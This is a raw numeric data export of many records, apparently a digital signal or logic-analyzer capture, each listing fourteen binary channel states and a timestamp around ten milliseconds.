1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428396e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428420e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428468e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428496e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428520e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428596e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428644e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428668e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428696e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428720e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428824e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428848e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.0428900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.0428924e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.0552532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0552720e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,1.0552752e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0552772e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0553052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0553076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0553100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0553124e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.0553132e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.0553148e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.0553176e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,1.0553180e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0553184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0553200e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.0553228e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.0553252e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.0553276e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0553284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0553300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0553324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0553348e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553404e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553428e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0553452e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553476e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0553500e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553524e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0553548e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553576e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,1.0553580e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553584e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553604e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553628e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0553652e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553676e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553724e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553732e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0553752e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553776e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553780e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553804e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553828e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0553948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0553976e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0553980e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554000e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554028e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,1.0554032e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554124e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554132e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554148e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554176e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554200e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554228e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554252e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554276e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554324e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554332e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554348e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554376e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554380e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554400e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554476e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554480e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554500e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554524e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554548e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554576e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554600e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554628e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554652e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554676e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554752e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554776e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554804e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554828e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0554852e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0554876e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554884e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0554952e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0554976e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555000e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555124e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555132e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555148e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555176e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,1.0555180e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555204e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555228e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555252e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555276e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555300e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555324e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555348e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555376e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555380e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555576e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555596e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555676e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555680e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555700e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555724e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555732e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555776e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555796e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555828e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555876e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555880e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.0555900e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.0555924e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555952e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0555976e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0555996e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556172e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556196e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556224e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556248e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556424e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556448e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556572e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556596e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556624e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556648e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556772e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556796e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556824e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556848e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0556972e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0556996e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557024e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557048e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557172e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557196e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557224e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557248e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557424e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557448e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557572e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557596e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557624e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557648e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557772e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557796e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557824e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557848e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0557972e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0557996e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558024e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558048e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558172e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558196e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558224e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558248e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558424e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558448e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558572e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558596e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558624e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558648e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558772e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558796e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558824e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558848e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0558972e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0558996e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559024e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559048e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559172e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559196e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559224e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559248e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559320e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0559396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0559420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0684436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0684616e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,1.0684636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0684660e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0684976e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0685004e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0685052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0685076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.0685124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.0685152e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685552e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685576e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685776e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0685948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0685976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686024e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686176e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0686952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0686976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687276e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687576e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687776e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.0687828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.0687852e-02 